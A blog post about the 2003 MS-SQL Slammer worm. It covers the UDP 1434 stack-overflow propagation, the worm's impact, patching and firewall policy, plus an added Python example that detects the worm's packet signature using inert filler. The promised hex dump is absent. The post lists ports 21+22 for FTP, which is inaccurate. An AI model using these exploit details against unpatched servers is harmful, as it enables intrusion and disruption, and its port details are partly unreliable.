
Techy: MS-SQL Slammer

[MS-SQL Slammer Worm]

As you may have already heard, over the weekend the Internet was hit by one of the fastest spreading worms since the original Morris worm. The name of this nasty piece of code? “MS-SQL Slammer”, so called because it uses a 6-month-old exploit in unpatched Microsoft SQL servers as its method of spreading, and it spreads so quickly that it caused major problems across the ’net.

Actually, to call it a nasty piece of work is doing a disservice to the author (who is, at this moment in time, still unknown). It’s a lovely piece of optimised assembly code which does “its job” in just 376 bytes (to put that in perspective – that is exactly the length, in letters, spaces and punctuation, of the first paragraph of this entry).

When the code infects an unpatched Microsoft SQL Server 2000 or Microsoft Desktop Engine (MSDE – which is included in Visual Studio.net, Asp.net Web Matrix Tool, Office XP Developer Edition, MSDN Universal and Enterprise, Microsoft Access and Microsoft Application 2000), it first loads the “modules” Kernel32.dll and WS2_32.dll. It then calls the routine “GetTickCount” to seed the generation of random IP (Internet Protocol) addresses, which it then targets for propagation and exploitation over UDP (User Datagram Protocol) port 1434. It repeats the exploit (a stack buffer overflow) against fresh addresses until either the SQL server is shut down or the machine is rebooted.

Whilst it does no damage to any files and is only “memory resident” (once you reboot, the worm is gone), it can consume enormous amounts of bandwidth – so much, in fact, that it caused 5 of the main 13 root DNS name servers to go down. These machines aren’t, in fact, running MS-SQL server (and hence cannot be infected by this worm), but they (or the routers attached to them) simply couldn’t cope with the extremely large amount of traffic that was suddenly being sent to them. If it had been a gradual increase over a number of months (as the internet typically grows) then the servers could have been upgraded – but this was like driving down a 6-lane motorway that is suddenly reduced to a single lane. The Bank Of America suffered problems with over 13,000 ATMs (Automatic Teller Machines) because of technical problems caused by the worm. Dshield.org registered 15,510,276 reports of attacks by the worm within a 24 hour period on the 25th – making it responsible for around 80.48% of all server attacks that day.

MS-SQL Slammer – also known as w2.SQLSlammer.worm, Sapphire, w32.SQLexp.worm and Helkern – which initially appeared around 05:30am UTC/GMT on Saturday (25th January), is reckoned to have infected around a quarter of a million computers worldwide and, whilst many ISPs (Internet Service Providers) have now put filters in place to stop the worm, it is still causing scattered slowdowns in internet traffic.

The worm could have been prevented in a number of simple ways – one would be ensuring that the system administrator of the SQL server does his/her/their job by keeping it up to date with the relevant patches from Microsoft (or installing SQL 2000 Service Pack 3) – this security hole was patched back in July 2002!

The other simple way is just a good firewall strategy: many people think you should “accept all, block set ports”, but if you were to go for the “block all, accept set ports” method and only opened up to the internet the computer “ports” you actually needed (for example, port 80 for web traffic, 21+22 for FTP, 25+110 for email and 22 or 23 for Telnet or SSH) then you would already have been protected against the worm, since UDP port 1434 would never have been opened.
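As an added example (not from the original post), the two firewall policies contrasted above applied to constructed packets, alongside the traffic shape described earlier: a single UDP datagram to port 1434 carrying a 376-byte payload. The packet bytes, the port lists and the inert filler standing in for the worm’s code are all constructed here; the 0x04 lead byte and the run of 0x01 padding are the worm’s published signature, not its code.

```python
import struct
SSRS_PORT = 1434           # UDP port of the SQL Server Resolution Service
SLAMMER_PAYLOAD_LEN = 376  # worm size quoted in the post

# The post's example list of ports a server "actually needs" (all TCP; nothing on udp/1434).
NEEDED_PORTS = {("tcp", 80), ("tcp", 21), ("tcp", 22), ("tcp", 25), ("tcp", 110), ("tcp", 23)}

def build_packet(proto, sport, dport, payload=b""):
    """Construct a minimal IPv4 + TCP/UDP packet for the demo (checksums left zero)."""
    l4 = (struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) if proto == "udp"
          else struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x02, 0, 0, 0))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4) + len(payload), 0, 0, 64,
                     17 if proto == "udp" else 6, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return ip + l4 + payload

def parse_packet(frame):
    """Return (proto, sport, dport, udp_payload) from an IPv4 packet (no Ethernet header)."""
    ihl = (frame[0] & 0x0F) * 4
    proto = {6: "tcp", 17: "udp"}.get(frame[9], "other")
    sport, dport = struct.unpack("!HH", frame[ihl:ihl + 4])
    payload = frame[ihl + 8:] if proto == "udp" else b""
    return proto, sport, dport, payload

def looks_like_slammer(frame):
    """Shape of the worm's one datagram: UDP to 1434 with a 376-byte payload that starts
    with 0x04 (an SSRS request type) followed by a long run of 0x01 (overflow padding)."""
    proto, _, dport, payload = parse_packet(frame)
    return (proto == "udp" and dport == SSRS_PORT and len(payload) == SLAMMER_PAYLOAD_LEN
            and payload[0] == 0x04 and payload[1:97] == b"\x01" * 96)

def accept_all_block_listed(frame, blocked):
    """'Accept all, block set ports': anything not on the block list gets through."""
    proto, _, dport, _ = parse_packet(frame)
    return (proto, dport) not in blocked

def block_all_accept_listed(frame, allowed):
    """'Block all, accept set ports': only explicitly listed services get through."""
    proto, _, dport, _ = parse_packet(frame)
    return (proto, dport) in allowed

# Constructed traffic: a web request and a datagram with the worm's shape but inert filler.
WEB_REQUEST = build_packet("tcp", 40001, 80)
SLAMMER_SHAPED = build_packet("udp", 4296, SSRS_PORT,
                              b"\x04" + b"\x01" * 96 + b"\x00" * (SLAMMER_PAYLOAD_LEN - 97))

def compare_policies(frames, blocked=frozenset({("tcp", 135)}), allowed=NEEDED_PORTS):
    """Per packet: (slammer-like?, passes the block-list policy?, passes the allow-list policy?).
    The block list stands for one written before the worm existed, so udp/1434 is not on it."""
    return [(looks_like_slammer(f), accept_all_block_listed(f, blocked),
             block_all_accept_listed(f, allowed)) for f in frames]
```

Running compare_policies over the two constructed packets shows the block-list policy passing the worm-shaped datagram while the allow-list policy drops it.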

Yes, it is possible to blame Microsoft for writing faulty code which had this exploitable hole in it – but in all fairness they did release a patch in a timely manner (a week or so after it was initially reported to them) and alerted people who asked for that sort of alert (they do have an email notification list) – plus the fact that “standard firewall protection methods” should have blocked the worm means that the main people to blame for this worm being able to spread so freely about the internet are the systems administrators. If you find out that your site was responsible for some of the spread, then I would suggest a review of your IT personnel…

Here’s the actual code from the worm:


The only "important" details in that dump are the readable strings in its far right (ASCII) column, which show the names the worm resolves: kernel32.dll, GetTickCount, ws2_32.dll, socket and sendto. The rest is just the hexadecimal "memory dump" of the worm.

2 Comments

  1. Fascinating.

    I heard some rumbling that it could have a phase 2 to trigger at a later date on already-infected machines, but based on your comments, rebooting cleared it.

    Any word if there’s any truth to that one? I want to be ready to snicker again when it happens.

  2. Nope, there’s no time sensitive code in it. However, unless the servers are patched it’ll be easy for it to start spreading again.
